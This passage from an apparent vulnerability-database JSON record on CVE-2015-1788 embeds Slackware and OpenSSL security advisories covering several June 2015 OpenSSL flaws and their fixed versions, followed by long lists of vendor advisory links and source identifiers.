openssl-solibs-0.9.8zg-x86_64-1_slack13.1.txz\n\nSlackware 13.37 packages:\n5e7501b1d73d01d3d87704c3cfd3a888  openssl-0.9.8zg-i486-1_slack13.37.txz\n874f0b59870dd3f259640c9930a02f99  openssl-solibs-0.9.8zg-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 packages:\nb6d91614458040d461dff3c3eab45206  openssl-0.9.8zg-x86_64-1_slack13.37.txz\nbe106df5e59c2be7fa442df8ba85ad0b  openssl-solibs-0.9.8zg-x86_64-1_slack13.37.txz\n\nSlackware 14.0 packages:\nee7c3937e6a6d7ac7537f751af7da7b9  openssl-1.0.1n-i486-1_slack14.0.txz\n758662437d33f99ec0a686cedeb1919e  openssl-solibs-1.0.1n-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 packages:\n2dfdc4729e93cf460018e9e30a6223dc  openssl-1.0.1n-x86_64-1_slack14.0.txz\n9cb4b34e97e60f6bfe4c843aabeae954  openssl-solibs-1.0.1n-x86_64-1_slack14.0.txz\n\nSlackware 14.1 packages:\n5a9bf08d55615cfc097109c2e3786f7b  openssl-1.0.1n-i486-1_slack14.1.txz\nfb1c05468e5c38d51a8ff6ac435e3a20  openssl-solibs-1.0.1n-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 packages:\n1ef5cede3f954c3e4741012ffa76b750  openssl-1.0.1n-x86_64-1_slack14.1.txz\nea22c288c60ae1d7ea8c5b3a1608462b  openssl-solibs-1.0.1n-x86_64-1_slack14.1.txz\n\nSlackware -current packages:\n56db8712d653c060f910e8915a8f8656  a/openssl-solibs-1.0.1n-i586-1.txz\n6d6264c9943e27240db5c8f5ec342e27  n/openssl-1.0.1n-i586-1.txz\n\nSlackware x86_64 -current packages:\ne73f7aff5aa0ad14bc06428544f99ae2  a/openssl-solibs-1.0.1n-x86_64-1.txz\n91b550b9eb0ac0c580e158375a93c0e4  n/openssl-1.0.1n-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg openssl-1.0.1n-i486-1_slack14.1.txz openssl-solibs-1.0.1n-i486-1_slack14.1.txz\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list:                          |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message:                                                     |\n|                                                                        |\n|   unsubscribe slackware-security                                       |\n|                                                                        |\n| You will get a confirmation message back containing instructions to    |\n| complete the process.  Please do not reply to this email address. \n\nPlease download the latest version of HPE Version Control Repository Manager\n(VCRM) (7.5.1) from the following location:\n\nVCRM for Windows:\n\nhttps://www.hp.com/swpublishing/MTX-b59b11be53744759a650eadeb4\n\nVCRM for Linux is only available only with HPE Systems Insight Manager (HPE\nSIM):\n\nhttps://www.hp.com/go/sim\n\nHISTORY\nVersion:1 (rev.1) - 12 May 2016 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. OpenSSL Security Advisory [11 Jun 2015]\n=======================================\n\nDHE man-in-the-middle protection (Logjam)\n====================================================================\n\nA vulnerability in the TLS protocol allows a man-in-the-middle\nattacker to downgrade vulnerable TLS connections using ephemeral\nDiffie-Hellman key exchange to 512-bit export-grade cryptography. This\nvulnerability is known as Logjam (CVE-2015-4000). \n\nOpenSSL has added protection for TLS clients by rejecting handshakes\nwith DH parameters shorter than 768 bits. This limit will be increased\nto 1024 bits in a future release. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2b\nOpenSSL 1.0.1 users should upgrade to 1.0.1n\n\nFixes for this issue were developed by Emilia K\u00e4sper and Kurt Roeckx\nof the OpenSSL development team. \n\nThis can be used to perform denial of service against any\nsystem which processes public keys, certificate requests or\ncertificates.  This includes TLS clients and TLS servers with\nclient authentication enabled. \n\nThis issue affects OpenSSL versions: 1.0.2 and 1.0.1. Recent\n1.0.0 and 0.9.8 versions are not affected. 1.0.0d and 0.9.8r and below are\naffected. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2b\nOpenSSL 1.0.1 users should upgrade to 1.0.1n\nOpenSSL 1.0.0d (and below) users should upgrade to 1.0.0s\nOpenSSL 0.9.8r (and below) users should upgrade to 0.9.8zg\n\nThis issue was reported to OpenSSL on 6th April 2015 by Joseph Birr-Pixton. The\nfix was developed by Andy Polyakov of the OpenSSL development team. \n\nExploitable out-of-bounds read in X509_cmp_time (CVE-2015-1789)\n===============================================================\n\nSeverity: Moderate\n\nX509_cmp_time does not properly check the length of the ASN1_TIME\nstring and can read a few bytes out of bounds. In addition,\nX509_cmp_time accepts an arbitrary number of fractional seconds in the\ntime string. \n\nAn attacker can use this to craft malformed certificates and CRLs of\nvarious sizes and potentially cause a segmentation fault, resulting in\na DoS on applications that verify certificates or CRLs. TLS clients\nthat verify CRLs are affected. TLS clients and servers with client\nauthentication enabled may be affected if they use custom verification\ncallbacks. \n\nThis issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0 and 0.9.8. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2b\nOpenSSL 1.0.1 users should upgrade to 1.0.1n\nOpenSSL 1.0.0 users should upgrade to 1.0.0s\nOpenSSL 0.9.8 users should upgrade to 0.9.8zg\n\nThis issue was reported to OpenSSL on 8th April 2015 by Robert Swiecki\n(Google), and independently on 11th April 2015 by Hanno B\u00f6ck. The fix\nwas developed by Emilia K\u00e4sper of the OpenSSL development team. \n\nPKCS7 crash with missing EnvelopedContent (CVE-2015-1790)\n=========================================================\n\nSeverity: Moderate\n\nThe PKCS#7 parsing code does not handle missing inner EncryptedContent\ncorrectly. An attacker can craft malformed ASN.1-encoded PKCS#7 blobs\nwith missing content and trigger a NULL pointer dereference on parsing. \n\nApplications that decrypt PKCS#7 data or otherwise parse PKCS#7\nstructures from untrusted sources are affected. OpenSSL clients and\nservers are not affected. \n\nThis issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0 and 0.9.8. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2b\nOpenSSL 1.0.1 users should upgrade to 1.0.1n\nOpenSSL 1.0.0 users should upgrade to 1.0.0s\nOpenSSL 0.9.8 users should upgrade to 0.9.8zg\n\nThis issue was reported to OpenSSL on 18th April 2015 by  Michal\nZalewski (Google). The fix was developed by Emilia K\u00e4sper of the\nOpenSSL development team. \n\nCMS verify infinite loop with unknown hash function (CVE-2015-1792)\n===================================================================\n\nSeverity: Moderate\n\nWhen verifying a signedData message the CMS code can enter an infinite loop\nif presented with an unknown hash function OID. \n\nThis can be used to perform denial of service against any system which\nverifies signedData messages using the CMS code. \n\nThis issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0 and 0.9.8. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2b\nOpenSSL 1.0.1 users should upgrade to 1.0.1n\nOpenSSL 1.0.0 users should upgrade to 1.0.0s\nOpenSSL 0.9.8 users should upgrade to 0.9.8zg\n\nThis issue was reported to OpenSSL on 31st March 2015 by Johannes Bauer. The\nfix was developed by Dr. Stephen Henson of the OpenSSL development team. \n\nRace condition handling NewSessionTicket (CVE-2015-1791)\n========================================================\n\nSeverity: Low\n\nIf a NewSessionTicket is received by a multi-threaded client when attempting to\nreuse a previous ticket then a race condition can occur potentially leading to\na double free of the ticket data. \n\nThis issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0 and 0.9.8. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2b\nOpenSSL 1.0.1 users should upgrade to 1.0.1n\nOpenSSL 1.0.0 users should upgrade to 1.0.0s\nOpenSSL 0.9.8 users should upgrade to 0.9.8zg\n\nThis issue was discovered by Emilia K\u00e4sper of the OpenSSL development team. The\nfix was developed by Matt Caswell of the OpenSSL development team. \n\nInvalid free in DTLS (CVE-2014-8176)\n====================================\n\nSeverity: Moderate\n\nThis vulnerability does not affect current versions of OpenSSL. It\nexisted in previous OpenSSL versions and was fixed in June 2014. \n\nIf a DTLS peer receives application data between the ChangeCipherSpec\nand Finished messages, buffering of such data may cause an invalid\nfree, resulting in a segmentation fault or potentially, memory\ncorruption. \n\nThis issue affected older OpenSSL versions 1.0.1, 1.0.0 and 0.9.8. \n\nOpenSSL 0.9.8 DTLS users should upgrade to 0.9.8za\nOpenSSL 1.0.0 DTLS users should upgrade to 1.0.0m. \nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1h. \n\nThis issue was originally reported on March 28th 2014 in\nhttps://rt.openssl.org/Ticket/Display.html?id=3286 by Praveen\nKariyanahalli, and subsequently by Ivan Fratric and Felix Groebert\n(Google). A fix was developed by zhu qun-ying. \n\nThe fix for this issue can be identified by commits bcc31166 (1.0.1),\nb79e6e3a (1.0.0) and 4b258e73 (0.9.8). \n\nNote\n====\n\nAs per our previous announcements and our Release Strategy\n(https://www.openssl.org/about/releasestrat.html), support for OpenSSL versions\n1.0.0 and 0.9.8 will cease on 31st December 2015. No security updates for these\nreleases will be provided after that date. Users of these releases are advised\nto upgrade. \n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv_20150611.txt\n\nNote: the online version of the advisory may be updated with additional\ndetails over time. \n\nFor details of OpenSSL severity classifications please see:\nhttps://www.openssl.org/about/secpolicy.html\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-1788"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-003080"
      },
      {
        "db": "BID",
        "id": "75158"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-1788"
      },
      {
        "db": "PACKETSTORM",
        "id": "132398"
      },
      {
        "db": "PACKETSTORM",
        "id": "132291"
      },
      {
        "db": "PACKETSTORM",
        "id": "137772"
      },
      {
        "db": "PACKETSTORM",
        "id": "132288"
      },
      {
        "db": "PACKETSTORM",
        "id": "132285"
      },
      {
        "db": "PACKETSTORM",
        "id": "136989"
      },
      {
        "db": "PACKETSTORM",
        "id": "169629"
      }
    ],
    "trust": 2.61
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2015-1788",
        "trust": 2.9
      },
      {
        "db": "JUNIPER",
        "id": "JSA10694",
        "trust": 1.4
      },
      {
        "db": "BID",
        "id": "75158",
        "trust": 1.4
      },
      {
        "db": "SIEMENS",
        "id": "SSA-412672",
        "trust": 1.1
      },
      {
        "db": "BID",
        "id": "91787",
        "trust": 1.1
      },
      {
        "db": "SECTRACK",
        "id": "1032564",
        "trust": 1.1
      },
      {
        "db": "MCAFEE",
        "id": "SB10122",
        "trust": 1.1
      },
      {
        "db": "JVN",
        "id": "JVNVU91445763",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-003080",
        "trust": 0.8
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-22-349-21",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-1788",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "132398",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "132291",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "137772",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "132288",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "132285",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "136989",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "169629",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2015-1788"
      },
      {
        "db": "BID",
        "id": "75158"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-003080"
      },
      {
        "db": "PACKETSTORM",
        "id": "132398"
      },
      {
        "db": "PACKETSTORM",
        "id": "132291"
      },
      {
        "db": "PACKETSTORM",
        "id": "137772"
      },
      {
        "db": "PACKETSTORM",
        "id": "132288"
      },
      {
        "db": "PACKETSTORM",
        "id": "132285"
      },
      {
        "db": "PACKETSTORM",
        "id": "136989"
      },
      {
        "db": "PACKETSTORM",
        "id": "169629"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-1788"
      }
    ]
  },
  "id": "VAR-201506-0231",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.2242063475
  },
  "last_update_date": "2024-07-23T20:32:53.570000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "APPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update 2015-006",
        "trust": 0.8,
        "url": "http://lists.apple.com/archives/security-announce/2015/aug/msg00001.html"
      },
      {
        "title": "HT205031",
        "trust": 0.8,
        "url": "https://support.apple.com/en-us/ht205031"
      },
      {
        "title": "HT205031",
        "trust": 0.8,
        "url": "https://support.apple.com/ja-jp/ht205031"
      },
      {
        "title": "cisco-sa-20150612-openssl",
        "trust": 0.8,
        "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20150612-openssl"
      },
      {
        "title": "bn/bn_gf2m.c: avoid infinite loop wich malformed ECParamters.",
        "trust": 0.8,
        "url": "https://github.com/openssl/openssl/commit/4924b37ee01f71ae19c94a8934b80eeb2f677932"
      },
      {
        "title": "HPSBUX03388",
        "trust": 0.8,
        "url": "http://marc.info/?l=bugtraq\u0026amp;m=143880121627664\u0026amp;w=2"
      },
      {
        "title": "HPSBMU03546",
        "trust": 0.8,
        "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05045763"
      },
      {
        "title": "HPSBMU03611",
        "trust": 0.8,
        "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05150888"
      },
      {
        "title": "HPSBMU03612",
        "trust": 0.8,
        "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05158380"
      },
      {
        "title": "HPSBHF03613",
        "trust": 0.8,
        "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05184351"
      },
      {
        "title": "\u30a2\u30e9\u30a4\u30c9\u30c6\u30ec\u30b7\u30b9\u682a\u5f0f\u4f1a\u793e\u304b\u3089\u306e\u60c5\u5831",
        "trust": 0.8,
        "url": "http://jvn.jp/vu/jvnvu91445763/522154/index.html"
      },
      {
        "title": "NV15-010",
        "trust": 0.8,
        "url": "http://jpn.nec.com/security-info/secinfo/nv15-010.html"
      },
      {
        "title": "OpenSSL vulnerabilities",
        "trust": 0.8,
        "url": "https://www.openssl.org/news/vulnerabilities.html"
      },
      {
        "title": "Tarballs",
        "trust": 0.8,
        "url": "https://www.openssl.org/source/"
      },
      {
        "title": "[11 Jun 2015] DHE man-in-the-middle protection (Logjam)",
        "trust": 0.8,
        "url": "https://www.openssl.org/news/secadv_20150611.txt"
      },
      {
        "title": "Text Form of Oracle Critical Patch Update - October 2015 Risk Matrices",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015verbose-2367954.html"
      },
      {
        "title": "Oracle Critical Patch Update Advisory - January 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html"
      },
      {
        "title": "Text Form of Oracle Critical Patch Update - January 2016 Risk Matrices",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016verbose-2367956.html"
      },
      {
        "title": "Oracle Critical Patch Update Advisory - July 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html"
      },
      {
        "title": "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html"
      },
      {
        "title": "Oracle Critical Patch Update Advisory - October 2015",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html"
      },
      {
        "title": "Oracle Solaris Third Party Bulletin - July 2015",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/bulletinjul2015-2511963.html"
      },
      {
        "title": "October 2015 Critical Patch Update Released",
        "trust": 0.8,
        "url": "https://blogs.oracle.com/security/entry/october_2015_critical_patch_update"
      },
      {
        "title": "January 2016 Critical Patch Update Released",
        "trust": 0.8,
        "url": "https://blogs.oracle.com/security/entry/january_2016_critical_patch_update"
      },
      {
        "title": "July 2016 Critical Patch Update Released",
        "trust": 0.8,
        "url": "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update"
      },
      {
        "title": "JSA10694",
        "trust": 0.8,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10694"
      },
      {
        "title": "cisco-sa-20150612-openssl",
        "trust": 0.8,
        "url": "http://www.cisco.com/cisco/web/support/jp/112/1129/1129443_cisco-sa-20150612-openssl-j.html"
      },
      {
        "title": "The Register",
        "trust": 0.2,
        "url": "https://www.theregister.co.uk/2016/07/06/hpe_rushes_out_patch_for_more_than_a_year_of_openssl_vulns/"
      },
      {
        "title": "Red Hat: CVE-2015-1788",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2015-1788"
      },
      {
        "title": "Ubuntu Security Notice: openssl vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2639-1"
      },
      {
        "title": "Tenable Security Advisories: [R7] OpenSSL \u002720150611\u0027 Advisory Affects Tenable Products",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2015-07"
      },
      {
        "title": "Cisco: Multiple Vulnerabilities in OpenSSL (June 2015) Affecting Cisco Products",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20150612-openssl"
      },
      {
        "title": "Symantec Security Advisories: SA98 : OpenSSL Security Advisory 11-June-2015",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=a7350b0751124b5a44ba8dbd2df71f9f"
      },
      {
        "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - July 2015",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=8b701aba68029ec36b631a8e26157a22"
      },
      {
        "title": "Citrix Security Bulletins: Multiple Security Vulnerabilities in Citrix NetScaler Platform IPMI Lights Out Management (LOM) firmware",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=eb059834b7f24e2562bcf592b6d0afbc"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - October 2015",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=744c19dc9f4f70ad58059bf8733ec9c1"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - October 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=05aabe19d38058b7814ef5514aab4c0c"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - January 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=69e9536e77203a3c76b24dd89f4f9300"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - April 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=143b3fb255063c81571469eaa3cf0a87"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - July 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=2f446a7e1ea263c0c3a365776c6713f2"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - July 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=3a04485ebb79f7fbc2472bf9af5ce489"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - January 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=63802a6c83b107c4e6e0c7f9241a66a8"
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/aravindb26/new.txt "
      },
      {
        "title": "afl-cve",
        "trust": 0.1,
        "url": "https://github.com/mrash/afl-cve "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2015-1788"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-003080"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-399",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-003080"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-1788"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.5,
        "url": "https://www.openssl.org/news/secadv_20150611.txt"
      },
      {
        "trust": 1.4,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10694"
      },
      {
        "trust": 1.4,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html"
      },
      {
        "trust": 1.4,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html"
      },
      {
        "trust": 1.4,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html"
      },
      {
        "trust": 1.4,
        "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20150612-openssl"
      },
      {
        "trust": 1.4,
        "url": "https://support.citrix.com/article/ctx216642"
      },
      {
        "trust": 1.2,
        "url": "http://www.securityfocus.com/bid/75158"
      },
      {
        "trust": 1.2,
        "url": "https://security.gentoo.org/glsa/201506-02"
      },
      {
        "trust": 1.1,
        "url": "https://github.com/openssl/openssl/commit/4924b37ee01f71ae19c94a8934b80eeb2f677932"
      },
      {
        "trust": 1.1,
        "url": "http://lists.apple.com/archives/security-announce/2015/aug/msg00001.html"
      },
      {
        "trust": 1.1,
        "url": "https://support.apple.com/kb/ht205031"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=bugtraq\u0026m=143880121627664\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html"
      },
      {
        "trust": 1.1,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05131044"
      },
      {
        "trust": 1.1,
        "url": "http://www.securityfocus.com/bid/91787"
      },
      {
        "trust": 1.1,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05150888"
      },
      {
        "trust": 1.1,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05158380"
      },
      {
        "trust": 1.1,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05184351"
      },
      {
        "trust": 1.1,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05045763"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=bugtraq\u0026m=144050155601375\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "http://www.oracle.com/technetwork/topics/security/bulletinjul2015-2511963.html"
      },
      {
        "trust": 1.1,
        "url": "http://fortiguard.com/advisory/2015-07-09-cve-2015-1793-openssl-alternative-chains-certificate-forgery"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html"
      },
      {
        "trust": 1.1,
        "url": "https://openssl.org/news/secadv/20150611.txt"
      },
      {
        "trust": 1.1,
        "url": "http://fortiguard.com/advisory/openssl-vulnerabilities-june-2015"
      },
      {
        "trust": 1.1,
        "url": "http://www.fortiguard.com/advisory/openssl-vulnerabilities-june-2015"
      },
      {
        "trust": 1.1,
        "url": "http://www-304.ibm.com/support/docview.wss?uid=swg21960041"
      },
      {
        "trust": 1.1,
        "url": "https://bto.bluecoat.com/security-advisory/sa98"
      },
      {
        "trust": 1.1,
        "url": "http://www.fortiguard.com/advisory/2015-06-11-fortinet-vulnerability-openssl-vulnerabilities-june-2015"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00037.html"
      },
      {
        "trust": 1.1,
        "url": "http://ftp.netbsd.org/pub/netbsd/security/advisories/netbsd-sa2015-008.txt.asc"
      },
      {
        "trust": 1.1,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10122"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00007.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00006.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00004.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00003.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00026.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00024.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00023.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.ubuntu.com/usn/usn-2639-1"
      },
      {
        "trust": 1.1,
        "url": "http://www.securitytracker.com/id/1032564"
      },
      {
        "trust": 1.1,
        "url": "http://www.debian.org/security/2015/dsa-3287"
      },
      {
        "trust": 1.1,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html"
      },
      {
        "trust": 1.1,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf"
      },
      {
        "trust": 0.9,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-1788"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/vu/jvnvu91445763/index.html"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-1788"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1788"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1792"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1790"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1789"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1791"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4000"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8176"
      },
      {
        "trust": 0.3,
        "url": "http://openssl.org/"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963362"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022444"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21962775"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21965845"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/bugtraq/2015/aug/13"
      },
      {
        "trust": 0.3,
        "url": "http://prod.lists.apple.com/archives/security-announce/2015/aug/msg00001.html"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05184351"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/bugtraq/2015/aug/135"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05131044"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05150888"
      },
      {
        "trust": 0.3,
